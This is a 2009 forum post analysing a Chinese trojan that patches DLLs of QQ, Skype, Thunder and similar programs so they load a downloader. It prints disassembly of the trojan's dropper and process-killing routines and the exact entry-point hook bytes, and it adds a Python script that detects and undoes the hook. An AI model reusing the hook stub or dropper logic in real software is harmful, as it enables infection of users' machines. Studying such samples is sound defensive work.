zzage
Posted on 2009-3-12 18:28
【Title】Analysis of a trojan that infects QQ, Thunder, Skype, PPStream and other software
【Author】ZzAge
【Target】a certain trojan
【Tools】IDA
【Author QQ】85400516
【Author e-mail】zzage@163.com
【Author homepage】http://hi.baidu.com/zzage
【Date】12 March 2009
To be honest the title is clickbait: all this trojan does is modify a DLL belonging to QQ, QQ Game, Thunder, Skype, PPStream or Storm so that the patched DLL loads the trojan's own DLL, which in turn downloads the trojan from the network.
Still, if it spreads widely the damage is considerable, since most machines have QQ, Thunder and the like installed...
1. Query the registry to find the install paths of the software to be infected.

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\PPStream.exe\shell\open\comm
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\Storm.exe\shell\open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Tencent\QQ\Install
HKEY_LOCAL_MACHINE\SOFTWARE\Tencent\QQ2009\Install
HKEY_LOCAL_MACHINE\SOFTWARE\Tencent\QQGame\SYS\GameDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Skype\Phone\SkypePath
HKEY_LOCAL_MACHINE\SOFTWARE\Thunder Network\ThunderOem\thunder_backwnd\Path

The lookup routine (sub_401250, below) is a 7-way switch on a product index. Each case opens its key under HKEY_LOCAL_MACHINE (80000002h) with samDesired = 1 (KEY_QUERY_VALUE); a second switch on the same index then calls RegQueryValueExW for the value: Install, GameDirectory, SkypePath or Path by name, while the two shell\open\command keys are queried through an unnamed pointer (dword_40AABC) that IDA did not resolve, most likely the key's default value. cbData starts at 400h and the routine returns 0 if the value turns out to be longer than 100h bytes, so a product installed under a path longer than 128 wide characters is silently skipped. When RegQueryValueExW fails the key handle is never closed; only the success path calls RegCloseKey and returns 1.

.nsp0:00401250 push ecx
.nsp0:00401251 push esi
.nsp0:00401252 mov esi, [esp+8+hKey]
.nsp0:00401256 cmp esi, 6 ; switch 7 cases
.nsp0:00401259 mov [esp+8+cbData], 400h
.nsp0:00401261 ja loc_401331 ; default
.nsp0:00401267 jmp off_401428[esi*4] ; switch jump
.nsp0:0040126E
.nsp0:0040126E loc_40126E: ; DATA XREF: .nsp0:off_401428o
.nsp0:0040126E lea eax, [esp+8+hKey] ; jumptable 00401267 case 5
.nsp0:00401272 push eax ; phkResult
.nsp0:00401273 push 1 ; samDesired
.nsp0:00401275 push 0 ; ulOptions
.nsp0:00401277 push offset SubKey ; "SOFTWARE\\Classes\\Applications\\PPStream."...
.nsp0:0040127C push 80000002h ; hKey
.nsp0:00401281 call RegOpenKeyExW
.nsp0:00401287 jmp loc_401335
.nsp0:0040128C ; ---------------------------------------------------------------------------
.nsp0:0040128C
.nsp0:0040128C loc_40128C: ; CODE XREF: sub_401250+17j
.nsp0:0040128C ; DATA XREF: .nsp0:off_401428o ...
.nsp0:0040128C lea ecx, [esp+8+hKey] ; jumptable 00401267 case 4
.nsp0:00401290 push ecx ; phkResult
.nsp0:00401291 push 1 ; samDesired
.nsp0:00401293 push 0 ; ulOptions
.nsp0:00401295 push offset aSoftwareClas_0 ; "SOFTWARE\\Classes\\Applications\\Storm.exe"...
.nsp0:0040129A push 80000002h ; hKey
.nsp0:0040129F call RegOpenKeyExW
.nsp0:004012A5 jmp loc_401335
.nsp0:004012AA ; ---------------------------------------------------------------------------
.nsp0:004012AA
.nsp0:004012AA loc_4012AA: ; CODE XREF: sub_401250+17j
.nsp0:004012AA ; DATA XREF: .nsp0:off_401428o
.nsp0:004012AA lea edx, [esp+8+hKey] ; jumptable 00401267 case 0
.nsp0:004012AE push edx ; phkResult
.nsp0:004012AF push 1 ; samDesired
.nsp0:004012B1 push 0 ; ulOptions
.nsp0:004012B3 push offset aSoftwareTencen ; "SOFTWARE\\Tencent\\QQ"
.nsp0:004012B8 push 80000002h ; hKey
.nsp0:004012BD call RegOpenKeyExW
.nsp0:004012C3 jmp short loc_401335
.nsp0:004012C5 ; ---------------------------------------------------------------------------
.nsp0:004012C5
.nsp0:004012C5 loc_4012C5: ; CODE XREF: sub_401250+17j
.nsp0:004012C5 ; DATA XREF: .nsp0:off_401428o
.nsp0:004012C5 lea eax, [esp+8+hKey] ; jumptable 00401267 case 1
.nsp0:004012C9 push eax ; phkResult
.nsp0:004012CA push 1 ; samDesired
.nsp0:004012CC push 0 ; ulOptions
.nsp0:004012CE push offset aSoftwareTenc_0 ; "SOFTWARE\\Tencent\\QQ2009"
.nsp0:004012D3 push 80000002h ; hKey
.nsp0:004012D8 call RegOpenKeyExW
.nsp0:004012DE jmp short loc_401335
.nsp0:004012E0 ; ---------------------------------------------------------------------------
.nsp0:004012E0
.nsp0:004012E0 loc_4012E0: ; CODE XREF: sub_401250+17j
.nsp0:004012E0 ; DATA XREF: .nsp0:off_401428o
.nsp0:004012E0 lea ecx, [esp+8+hKey] ; jumptable 00401267 case 2
.nsp0:004012E4 push ecx ; phkResult
.nsp0:004012E5 push 1 ; samDesired
.nsp0:004012E7 push 0 ; ulOptions
.nsp0:004012E9 push offset aSoftwareTenc_1 ; "SOFTWARE\\Tencent\\QQGame\\SYS"
.nsp0:004012EE push 80000002h ; hKey
.nsp0:004012F3 call RegOpenKeyExW
.nsp0:004012F9 jmp short loc_401335
.nsp0:004012FB ; ---------------------------------------------------------------------------
.nsp0:004012FB
.nsp0:004012FB loc_4012FB: ; CODE XREF: sub_401250+17j
.nsp0:004012FB ; DATA XREF: .nsp0:off_401428o
.nsp0:004012FB lea edx, [esp+8+hKey] ; jumptable 00401267 case 3
.nsp0:004012FF push edx ; phkResult
.nsp0:00401300 push 1 ; samDesired
.nsp0:00401302 push 0 ; ulOptions
.nsp0:00401304 push offset aSoftwareSkypeP ; "SOFTWARE\\Skype\\Phone"
.nsp0:00401309 push 80000002h ; hKey
.nsp0:0040130E call RegOpenKeyExW
.nsp0:00401314 jmp short loc_401335
.nsp0:00401316 ; ---------------------------------------------------------------------------
.nsp0:00401316
.nsp0:00401316 loc_401316: ; CODE XREF: sub_401250+17j
.nsp0:00401316 ; DATA XREF: .nsp0:off_401428o
.nsp0:00401316 lea eax, [esp+8+hKey] ; jumptable 00401267 case 6
.nsp0:0040131A push eax ; phkResult
.nsp0:0040131B push 1 ; samDesired
.nsp0:0040131D push 0 ; ulOptions
.nsp0:0040131F push offset aSoftwareThunde ; "SOFTWARE\\Thunder Network\\ThunderOem\\thu"...
.nsp0:00401324 push 80000002h ; hKey
.nsp0:00401329 call RegOpenKeyExW
.nsp0:0040132F jmp short loc_401335
.nsp0:00401331 ; ---------------------------------------------------------------------------
.nsp0:00401331
.nsp0:00401331 loc_401331: ; CODE XREF: sub_401250+11j
.nsp0:00401331 mov eax, [esp+8+hKey] ; default
.nsp0:00401335
.nsp0:00401335 loc_401335: ; CODE XREF: sub_401250+37j
.nsp0:00401335 ; sub_401250+55j ...
.nsp0:00401335 test eax, eax
.nsp0:00401337 jnz loc_40141B
.nsp0:0040133D cmp esi, 6 ; switch 7 cases
.nsp0:00401340 ja loc_4013FE ; default
.nsp0:00401346 jmp off_401444[esi*4] ; switch jump
.nsp0:0040134D
.nsp0:0040134D loc_40134D: ; DATA XREF: .nsp0:off_401444o
.nsp0:0040134D mov edx, dword_40AAA0 ; jumptable 00401346 case 5
.nsp0:00401353 lea ecx, [esp+8+cbData]
.nsp0:00401357 push ecx
.nsp0:00401358 push edx
.nsp0:00401359 push 0
.nsp0:0040135B push 0
.nsp0:0040135D push offset dword_40AABC
.nsp0:00401362 jmp loc_4013EF
.nsp0:00401367 ; ---------------------------------------------------------------------------
.nsp0:00401367
.nsp0:00401367 loc_401367: ; CODE XREF: sub_401250+F6j
.nsp0:00401367 ; DATA XREF: .nsp0:off_401444o
.nsp0:00401367 mov edx, Str ; jumptable 00401346 case 4
.nsp0:0040136D lea ecx, [esp+8+cbData]
.nsp0:00401371 push ecx
.nsp0:00401372 push edx
.nsp0:00401373 push 0
.nsp0:00401375 push 0
.nsp0:00401377 push offset dword_40AABC
.nsp0:0040137C jmp short loc_4013EF
.nsp0:0040137E ; ---------------------------------------------------------------------------
.nsp0:0040137E
.nsp0:0040137E loc_40137E: ; CODE XREF: sub_401250+F6j
.nsp0:0040137E ; DATA XREF: .nsp0:off_401444o
.nsp0:0040137E mov edx, lpFileName ; jumptable 00401346 case 0
.nsp0:00401384 lea ecx, [esp+8+cbData]
.nsp0:00401388 push ecx
.nsp0:00401389 push edx
.nsp0:0040138A push 0
.nsp0:0040138C push 0
.nsp0:0040138E push offset aInstall ; "Install"
.nsp0:00401393 jmp short loc_4013EF
.nsp0:00401395 ; ---------------------------------------------------------------------------
.nsp0:00401395
.nsp0:00401395 loc_401395: ; CODE XREF: sub_401250+F6j
.nsp0:00401395 ; DATA XREF: .nsp0:off_401444o
.nsp0:00401395 mov edx, dword_40AAB4 ; jumptable 00401346 case 1
.nsp0:0040139B lea ecx, [esp+8+cbData]
.nsp0:0040139F push ecx
.nsp0:004013A0 push edx
.nsp0:004013A1 push 0
.nsp0:004013A3 push 0
.nsp0:004013A5 push offset aInstall ; "Install"
.nsp0:004013AA jmp short loc_4013EF
.nsp0:004013AC ; ---------------------------------------------------------------------------
.nsp0:004013AC
.nsp0:004013AC loc_4013AC: ; CODE XREF: sub_401250+F6j
.nsp0:004013AC ; DATA XREF: .nsp0:off_401444o
.nsp0:004013AC mov edx, dword_40AAB0 ; jumptable 00401346 case 2
.nsp0:004013B2 lea ecx, [esp+8+cbData]
.nsp0:004013B6 push ecx
.nsp0:004013B7 push edx
.nsp0:004013B8 push 0
.nsp0:004013BA push 0
.nsp0:004013BC push offset aGamedirectory ; "GameDirectory"
.nsp0:004013C1 jmp short loc_4013EF
.nsp0:004013C3 ; ---------------------------------------------------------------------------
.nsp0:004013C3
.nsp0:004013C3 loc_4013C3: ; CODE XREF: sub_401250+F6j
.nsp0:004013C3 ; DATA XREF: .nsp0:off_401444o
.nsp0:004013C3 mov edx, dword_40AAAC ; jumptable 00401346 case 3
.nsp0:004013C9 lea ecx, [esp+8+cbData]
.nsp0:004013CD push ecx
.nsp0:004013CE push edx
.nsp0:004013CF push 0
.nsp0:004013D1 push 0
.nsp0:004013D3 push offset aSkypepath ; "SkypePath"
.nsp0:004013D8 jmp short loc_4013EF
.nsp0:004013DA ; ---------------------------------------------------------------------------
.nsp0:004013DA
.nsp0:004013DA loc_4013DA: ; CODE XREF: sub_401250+F6j
.nsp0:004013DA ; DATA XREF: .nsp0:off_401444o
.nsp0:004013DA mov edx, lpData ; jumptable 00401346 case 6
.nsp0:004013E0 lea ecx, [esp+8+cbData]
.nsp0:004013E4 push ecx ; lpcbData
.nsp0:004013E5 push edx ; lpData
.nsp0:004013E6 push 0 ; lpType
.nsp0:004013E8 push 0 ; lpReserved
.nsp0:004013EA push offset ValueName ; "Path"
.nsp0:004013EF
.nsp0:004013EF loc_4013EF: ; CODE XREF: sub_401250+112j
.nsp0:004013EF ; sub_401250+12Cj ...
.nsp0:004013EF mov eax, [esp+1Ch+hKey]
.nsp0:004013F3 push eax ; hKey
.nsp0:004013F4 call RegQueryValueExW
.nsp0:004013FA test eax, eax
.nsp0:004013FC jnz short loc_401421
.nsp0:004013FE
.nsp0:004013FE loc_4013FE: ; CODE XREF: sub_401250+F0j
.nsp0:004013FE cmp [esp+8+cbData], 100h ; default
.nsp0:00401406 ja short loc_401421
.nsp0:00401408 mov ecx, [esp+8+hKey]
.nsp0:0040140C push ecx ; hKey
.nsp0:0040140D call RegCloseKey
.nsp0:00401413 mov eax, 1
.nsp0:00401418 pop esi
.nsp0:00401419 pop ecx
.nsp0:0040141A retn
.nsp0:0040141B ; ---------------------------------------------------------------------------
.nsp0:0040141B
.nsp0:0040141B loc_40141B: ; CODE XREF: sub_401250+E7j
.nsp0:0040141B call GetLastError
.nsp0:00401421
.nsp0:00401421 loc_401421: ; CODE XREF: sub_401250+1ACj
.nsp0:00401421 ; sub_401250+1B6j
.nsp0:00401421 xor eax, eax
.nsp0:00401423 pop esi
.nsp0:00401424 pop ecx
.nsp0:00401425 retn
2. Drop the following two files and set their attributes to hidden:

C:\WINDOWS\temp\uninstaller.exe
C:\WINDOWS\temp\playList0.dat

The dropper routine (sub_401560, below) takes an index of 0 or 1 and looks up a resource of the custom type "BINARY" with ID 65h or 66h via FindResourceA, LoadResource, SizeofResource and LockResource. It creates the output file with CreateFileW (GENERIC_READ|GENERIC_WRITE = 0C0000000h, CREATE_ALWAYS = 2, FILE_ATTRIBUTE_NORMAL = 80h), writes the resource out one byte per WriteFile call, closes the handle and then applies FILE_ATTRIBUTE_HIDDEN (2) with SetFileAttributesW. Both paths are hard-coded, so the drop only works when the system directory really is C:\WINDOWS. For a responder this also means the two payloads can be pulled straight out of the dropper's resource section (type BINARY, IDs 101 and 102) without running it.

.nsp0:00401560 push ecx
.nsp0:00401561 push ebx
.nsp0:00401562 mov ebx, [esp+8+dwShareMode]
.nsp0:00401566 push ebp
.nsp0:00401567 push esi
.nsp0:00401568 test ebx, ebx
.nsp0:0040156A push edi
.nsp0:0040156B jnz short loc_40157C
.nsp0:0040156D mov eax, hModule
.nsp0:00401572 push offset Type ; "BINARY"
.nsp0:00401577 push 65h
.nsp0:00401579 push eax
.nsp0:0040157A jmp short loc_401593
.nsp0:0040157C ; ---------------------------------------------------------------------------
.nsp0:0040157C
.nsp0:0040157C loc_40157C: ; CODE XREF: sub_401560+Bj
.nsp0:0040157C cmp ebx, 1
.nsp0:0040157F jnz loc_40167A
.nsp0:00401585 mov ecx, hModule
.nsp0:0040158B push offset Type ; "BINARY"
.nsp0:00401590 push 66h ; lpName
.nsp0:00401592 push ecx ; hModule
.nsp0:00401593
.nsp0:00401593 loc_401593: ; CODE XREF: sub_401560+1Aj
.nsp0:00401593 call FindResourceA
.nsp0:00401599 mov esi, eax
.nsp0:0040159B test esi, esi
.nsp0:0040159D jz loc_40167A
.nsp0:004015A3 mov edx, hModule
.nsp0:004015A9 push esi ; hResInfo
.nsp0:004015AA push edx ; hModule
.nsp0:004015AB call LoadResource
.nsp0:004015B1 mov edi, eax
.nsp0:004015B3 test edi, edi
.nsp0:004015B5 jz loc_40167A
.nsp0:004015BB mov eax, hModule
.nsp0:004015C0 push esi ; hResInfo
.nsp0:004015C1 push eax ; hModule
.nsp0:004015C2 call SizeofResource
.nsp0:004015C8 push edi ; hResData
.nsp0:004015C9 mov ebp, eax
.nsp0:004015CB call LockResource
.nsp0:004015D1 test ebx, ebx
.nsp0:004015D3 mov esi, eax
.nsp0:004015D5 jnz short loc_4015EE
.nsp0:004015D7 push ebx
.nsp0:004015D8 push 80h
.nsp0:004015DD push 2
.nsp0:004015DF push ebx
.nsp0:004015E0 push 1
.nsp0:004015E2 push 0C0000000h
.nsp0:004015E7 push offset aCWindowsTempPl ; "C:\\WINDOWS\\temp\\playList0.dat"
.nsp0:004015EC jmp short loc_40160D
.nsp0:004015EE ; ---------------------------------------------------------------------------
.nsp0:004015EE
.nsp0:004015EE loc_4015EE: ; CODE XREF: sub_401560+75j
.nsp0:004015EE cmp ebx, 1
.nsp0:004015F1 jnz loc_40167A
.nsp0:004015F7 push 0 ; hTemplateFile
.nsp0:004015F9 push 80h ; dwFlagsAndAttributes
.nsp0:004015FE push 2 ; dwCreationDisposition
.nsp0:00401600 push 0 ; lpSecurityAttributes
.nsp0:00401602 push ebx ; dwShareMode
.nsp0:00401603 push 0C0000000h ; dwDesiredAccess
.nsp0:00401608 push offset FileName ; "C:\\WINDOWS\\temp\\uninstaller.exe"
.nsp0:0040160D
.nsp0:0040160D loc_40160D: ; CODE XREF: sub_401560+8Cj
.nsp0:0040160D call CreateFileW
.nsp0:00401613 mov ecx, ebp
.nsp0:00401615 dec ebp
.nsp0:00401616 test ecx, ecx
.nsp0:00401618 mov edi, eax
.nsp0:0040161A jz short loc_40163A
.nsp0:0040161C lea ebx, [ebp+1]
.nsp0:0040161F mov ebp, WriteFile
.nsp0:00401625
.nsp0:00401625 loc_401625: ; CODE XREF: sub_401560+D4j
.nsp0:00401625 lea edx, [esp+14h+NumberOfBytesWritten]
.nsp0:00401629 push 0 ; lpOverlapped
.nsp0:0040162B push edx ; lpNumberOfBytesWritten
.nsp0:0040162C push 1 ; nNumberOfBytesToWrite
.nsp0:0040162E push esi ; lpBuffer
.nsp0:0040162F push edi ; hFile
.nsp0:00401630 call ebp ; WriteFile
.nsp0:00401632 inc esi
.nsp0:00401633 dec ebx
.nsp0:00401634 jnz short loc_401625
.nsp0:00401636 mov ebx, [esp+14h+dwShareMode]
.nsp0:0040163A
.nsp0:0040163A loc_40163A: ; CODE XREF: sub_401560+BAj
.nsp0:0040163A push edi ; hObject
.nsp0:0040163B call CloseHandle
.nsp0:00401641 test ebx, ebx
.nsp0:00401643 jnz short loc_40165D
.nsp0:00401645 push 2 ; dwFileAttributes
.nsp0:00401647 push offset aCWindowsTempPl ; "C:\\WINDOWS\\temp\\playList0.dat"
.nsp0:0040164C call SetFileAttributesW
.nsp0:00401652 pop edi
.nsp0:00401653 pop esi
.nsp0:00401654 pop ebp
.nsp0:00401655 mov eax, 1
.nsp0:0040165A pop ebx
.nsp0:0040165B pop ecx
.nsp0:0040165C retn
.nsp0:0040165D ; ---------------------------------------------------------------------------
.nsp0:0040165D
.nsp0:0040165D loc_40165D: ; CODE XREF: sub_401560+E3j
.nsp0:0040165D cmp ebx, 1
.nsp0:00401660 jnz short loc_40166F
.nsp0:00401662 push 2 ; dwFileAttributes
.nsp0:00401664 push offset FileName ; "C:\\WINDOWS\\temp\\uninstaller.exe"
.nsp0:00401669 call SetFileAttributesW
.nsp0:0040166F
.nsp0:0040166F loc_40166F: ; CODE XREF: sub_401560+100j
.nsp0:0040166F pop edi
.nsp0:00401670 pop esi
.nsp0:00401671 pop ebp
.nsp0:00401672 mov eax, 1
.nsp0:00401677 pop ebx
.nsp0:00401678 pop ecx
.nsp0:00401679 retn
.nsp0:0040167A ; ---------------------------------------------------------------------------
.nsp0:0040167A
.nsp0:0040167A loc_40167A: ; CODE XREF: sub_401560+1Fj
.nsp0:0040167A ; sub_401560+3Dj ...
.nsp0:0040167A pop edi
.nsp0:0040167B pop esi
.nsp0:0040167C pop ebp
.nsp0:0040167D xor eax, eax
.nsp0:0040167F pop ebx
.nsp0:00401680 pop ecx
.nsp0:00401681 retn
3. Take a process snapshot, look for the following processes and terminate any that are running (presumably so that the target DLLs are not in use while they are rewritten):

qq.exe, skype.exe, storm.exe, ppstream.exe, thunder5.exe, ppsap.exe

sub_401460 allocates a PROCESSENTRY32 (dwSize = 128h), walks the snapshot with Process32First/Process32Next and compares szExeFile (offset 24h in the structure) against six string constants using a CRT string-compare routine that IDA could not name (unknown_libname_3). On a match it calls OpenProcess with PROCESS_ALL_ACCESS (1F0FFFh) and TerminateProcess; the process handle is never closed. Note the odd check right after Process32First succeeds: GetLastError is compared with 12h (ERROR_NO_MORE_FILES) and, if it matches, the loop and the CloseHandle on the snapshot are both skipped.

.nsp0:00401460 push ecx
.nsp0:00401461 push esi
.nsp0:00401462 push edi
.nsp0:00401463 push 128h ; unsigned int
.nsp0:00401468 call ??2@YAPAXI@Z ; operator new(uint)
.nsp0:0040146D add esp, 4
.nsp0:00401470 mov edi, eax
.nsp0:00401472 push 0 ; th32ProcessID
.nsp0:00401474 push 2 ; dwFlags
.nsp0:00401476 call CreateToolhelp32Snapshot
.nsp0:0040147B mov esi, eax
.nsp0:0040147D push edi ; lppe
.nsp0:0040147E push esi ; hSnapshot
.nsp0:0040147F mov [esp+14h+hSnapshot], esi
.nsp0:00401483 mov dword ptr [edi], 128h
.nsp0:00401489 call Process32First
.nsp0:0040148E test eax, eax
.nsp0:00401490 jz loc_40154D
.nsp0:00401496 call GetLastError
.nsp0:0040149C cmp eax, 12h
.nsp0:0040149F jz loc_401554
.nsp0:004014A5 push ebx
.nsp0:004014A6 mov ebx, OpenProcess
.nsp0:004014AC push ebp
.nsp0:004014AD mov ebp, TerminateProcess
.nsp0:004014B3 lea esi, [edi+24h]
.nsp0:004014B6
.nsp0:004014B6 loc_4014B6: ; CODE XREF: sub_401460+E1j
.nsp0:004014B6 push esi
.nsp0:004014B7 push offset dword_40830C
.nsp0:004014BC call unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
.nsp0:004014C1 add esp, 8
.nsp0:004014C4 test eax, eax
.nsp0:004014C6 jz short loc_401522
.nsp0:004014C8 push esi
.nsp0:004014C9 push offset dword_408300
.nsp0:004014CE call unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
.nsp0:004014D3 add esp, 8
.nsp0:004014D6 test eax, eax
.nsp0:004014D8 jz short loc_401522
.nsp0:004014DA push esi
.nsp0:004014DB push offset dword_4082F4
.nsp0:004014E0 call unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
.nsp0:004014E5 add esp, 8
.nsp0:004014E8 test eax, eax
.nsp0:004014EA jz short loc_401522
.nsp0:004014EC push esi
.nsp0:004014ED push offset dword_4082E4
.nsp0:004014F2 call unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
.nsp0:004014F7 add esp, 8
.nsp0:004014FA test eax, eax
.nsp0:004014FC jz short loc_401522
.nsp0:004014FE push esi
.nsp0:004014FF push offset dword_4082D4
.nsp0:00401504 call unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
.nsp0:00401509 add esp, 8
.nsp0:0040150C test eax, eax
.nsp0:0040150E jz short loc_401522
.nsp0:00401510 push esi
.nsp0:00401511 push offset dword_4082C8
.nsp0:00401516 call unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
.nsp0:0040151B add esp, 8
.nsp0:0040151E test eax, eax
.nsp0:00401520 jnz short loc_401534
.nsp0:00401522
.nsp0:00401522 loc_401522: ; CODE XREF: sub_401460+66j
.nsp0:00401522 ; sub_401460+78j ...
.nsp0:00401522 mov eax, [edi+8]
.nsp0:00401525 push eax ; dwProcessId
.nsp0:00401526 push 0 ; bInheritHandle
.nsp0:00401528 push 1F0FFFh ; dwDesiredAccess
.nsp0:0040152D call ebx ; OpenProcess
.nsp0:0040152F push 0 ; uExitCode
.nsp0:00401531 push eax ; hProcess
.nsp0:00401532 call ebp ; TerminateProcess
.nsp0:00401534
.nsp0:00401534 loc_401534: ; CODE XREF: sub_401460+C0j
.nsp0:00401534 mov ecx, [esp+14h+hSnapshot]
.nsp0:00401538 push edi ; lppe
.nsp0:00401539 push ecx ; hSnapshot
.nsp0:0040153A call Process32Next
.nsp0:0040153F test eax, eax
.nsp0:00401541 jnz loc_4014B6
.nsp0:00401547 mov esi, [esp+14h+hSnapshot]
.nsp0:0040154B pop ebp
.nsp0:0040154C pop ebx
.nsp0:0040154D
.nsp0:0040154D loc_40154D: ; CODE XREF: sub_401460+30j
.nsp0:0040154D push esi ; hObject
.nsp0:0040154E call CloseHandle
.nsp0:00401554
.nsp0:00401554 loc_401554: ; CODE XREF: sub_401460+3Fj
.nsp0:00401554 pop edi
.nsp0:00401555 pop esi
.nsp0:00401556 pop ecx
.nsp0:00401557 retn
4. Taking QQ as the example (the other products are handled the same way, only the patch offsets differ), the trojan locates QQGroupMng.dll in the QQ directory and modifies it in two places.

1: At the entry point it writes a jump to the code it writes at the second location:

6198F9E2 . /E9 EBA80000 jmp 6199A2D2

2: The code at the second location calls LoadLibraryA to load tmweotu.cfw (the file name is randomly generated) from the same directory:

6199A2D2 > \68 771D807C push kernel32.LoadLibraryA
6199A2D7 . E8 0C000000 call 6199A2E8 ; PUSH ASCII "tmweotu.cfw"
6199A2DC . 74 6D 77 65 6>ascii "tmweotu.cfw",0
6199A2E8 > 36:FF5424 04 call dword ptr [esp+4]
6199A2ED . 83C4 04 add esp, 4
6199A2F0 . 53 push ebx
6199A2F1 . 8B5D 08 mov ebx, dword ptr [ebp+8]
6199A2F4 . 56 push esi
6199A2F5 .^ E9 ED56FFFF jmp 6198F9E7

How the stub works: the call at 6199A2D7 pushes its own return address, which is the address of the ASCII string, and lands past the string at 6199A2E8. At that point the stack holds [esp] = pointer to "tmweotu.cfw" and [esp+4] = LoadLibraryA, so call dword ptr [esp+4] invokes LoadLibraryA with the string pointer as its argument. LoadLibraryA is stdcall and pops that argument itself, and add esp, 4 then discards the pushed LoadLibraryA address. The three instructions that follow (push ebx / mov ebx, [ebp+8] / push esi, exactly the 5 bytes the E9 jmp overwrote) are the displaced original code, after which the jump back to 6198F9E7 resumes the DLL's entry routine. Two details worth noting: mov ebx, [ebp+8] reads the entry routine's first argument through an already established frame, so the patched jmp most likely sits just after a push ebp / mov ebp, esp prologue rather than at the very first byte of the entry point; and the LoadLibraryA address is an absolute pointer into kernel32.dll baked into the patched file, so the infected DLL only works on machines with the same kernel32.dll build (there is no ASLR on Windows XP) and will most likely crash QQ at load time on any other.
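The following script is an added example, not code from the original post: it recognises the entry-point hook laid out in the two OllyDbg fragments above and restores the displaced bytes. It works on a flat copy of the DLL's bytes plus the file offset of the entry routine; turning AddressOfEntryPoint into that offset through the section table is left to a PE library (with pefile: pe.get_offset_from_rva(pe.OPTIONAL_HEADER.AddressOfEntryPoint)). The sample image is constructed from the bytes in the listing; the image base 0x61980000, the 3-byte push ebp / mov ebp, esp prologue placed before the hook, and the generalisation to names of any length and displaced regions of 5 to 15 bytes are my assumptions, not facts from the post.

```python
"""Detect and undo the LoadLibraryA entry-point hook from the OllyDbg listing."""
import struct

IMAGE_BASE = 0x61980000                       # assumption (module at 0x6198xxxx in OllyDbg)
HOOK_VA, STUB_VA = 0x6198F9E2, 0x6199A2D2     # addresses from the listing
ORIGINAL_PROLOGUE = bytes.fromhex("558bec")   # assumed: push ebp / mov ebp, esp before the hook


def _rel32_target(image, off):
    """Destination of the 5-byte E9/E8 rel32 instruction at `off`."""
    return off + 5 + struct.unpack_from("<i", image, off + 1)[0]


def parse_hook_at(image, hook_off):
    """Parse the stub reached from a 5-byte jmp at `hook_off`; None if it is not this hook.

    Stub layout recovered from the listing:
        68 imm32          push LoadLibraryA (absolute address)
        E8 rel32          call over the name; the pushed return address is the name pointer
        "<name>\\0"       ASCII file name, rel32 bytes long (12 in the sample)
        36 FF 54 24 04    call dword ptr ss:[esp+4]   -> LoadLibraryA(name)
        83 C4 04          add esp, 4                  -> drop the pushed address
        <displaced>       the original instructions the jmp overwrote
        E9 rel32          jmp back to hook_off + len(displaced)
    """
    if hook_off + 5 > len(image) or image[hook_off] != 0xE9:
        return None
    stub = _rel32_target(image, hook_off)
    if not 0 <= stub <= len(image) - 48 or image[stub] != 0x68:
        return None
    loadlib = struct.unpack_from("<I", image, stub + 1)[0]
    p = stub + 5
    if image[p] != 0xE8:
        return None
    name_off, name_end = p + 5, _rel32_target(image, p)
    if not name_off < name_end <= name_off + 64:
        return None
    raw = bytes(image[name_off:name_end])
    if b"\0" not in raw:
        return None
    name = raw.split(b"\0", 1)[0].decode("ascii", "replace")
    p = name_end
    if image[p:p + 8] != bytes.fromhex("36ff542404" "83c404"):
        return None
    p += 8
    # The displaced bytes end where a jmp back to hook_off + n begins (n >= 5, the jmp's own size).
    for n in range(5, 16):
        back = p + n
        if back + 5 <= len(image) and image[back] == 0xE9 and _rel32_target(image, back) == hook_off + n:
            return {"stub_off": stub, "loadlibrary_addr": loadlib, "loader_name": name,
                    "original_bytes": bytes(image[p:p + n])}
    return None


def find_hook(image, entry_off, window=16):
    """Scan the first `window` bytes of the entry routine; returns (hook_off, info) or None."""
    for off in range(entry_off, entry_off + window):
        info = parse_hook_at(image, off)
        if info is not None:
            return off, info
    return None


def disinfect(image, entry_off):
    """Copy of `image` with the original bytes restored over the jmp, or None if it is clean.

    The stub is left in place as dead code so section sizes and the rest of the file stay as they were.
    """
    hit = find_hook(image, entry_off)
    if hit is None:
        return None
    hook_off, info = hit
    fixed = bytearray(image)
    fixed[hook_off:hook_off + len(info["original_bytes"])] = info["original_bytes"]
    return fixed


def build_sample_image():
    """Constructed sample: the listing's bytes at their offsets in a zero-filled image."""
    img = bytearray(0x20000)
    hook, stub = HOOK_VA - IMAGE_BASE, STUB_VA - IMAGE_BASE
    entry = hook - len(ORIGINAL_PROLOGUE)
    img[entry:hook] = ORIGINAL_PROLOGUE
    img[hook:hook + 5] = bytes.fromhex("e9eba80000")      # jmp 6199A2D2
    stub_bytes = (
        bytes.fromhex("68771d807c")      # push 7C801D77 (kernel32.LoadLibraryA on the author's machine)
        + bytes.fromhex("e80c000000")    # call 6199A2E8; return address = &"tmweotu.cfw"
        + b"tmweotu.cfw\0"               # 12 bytes, exactly the call displacement
        + bytes.fromhex("36ff542404")    # call dword ptr ss:[esp+4]
        + bytes.fromhex("83c404")        # add esp, 4
        + bytes.fromhex("538b5d0856")    # displaced: push ebx / mov ebx,[ebp+8] / push esi
        + bytes.fromhex("e9ed56ffff")    # jmp 6198F9E7
    )
    img[stub:stub + len(stub_bytes)] = stub_bytes
    return img, entry


if __name__ == "__main__":
    img, entry = build_sample_image()
    off, info = find_hook(img, entry)
    print(f"hook at entry+0x{off - entry:x}: loads {info['loader_name']!r} via "
          f"LoadLibraryA@0x{info['loadlibrary_addr']:08x}, displaced {info['original_bytes'].hex()}")
    assert find_hook(disinfect(img, entry), entry) is None
```

The back-jump check is what keeps this from matching arbitrary E9 bytes: a hit requires the whole push/call/string/call/add sequence and a final jmp that lands exactly at the end of the displaced region. Restoring only the displaced bytes is enough to neutralise the loader; the leftover stub is unreachable, but if the file carried an Authenticode signature the repaired copy is still not the vendor's original and should be replaced from a clean install.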
3: The trojan then finds the DLL of each product to infect and writes the infection code into it (for QQ, QQGroupMng.dll), and copies C:\WINDOWS\temp\playList0.dat into the QQ directory under the randomly generated file name from above. From then on, every time QQ starts and loads QQGroupMng.dll, tmweotu.cfw is loaded as well and downloads the trojan from the network.

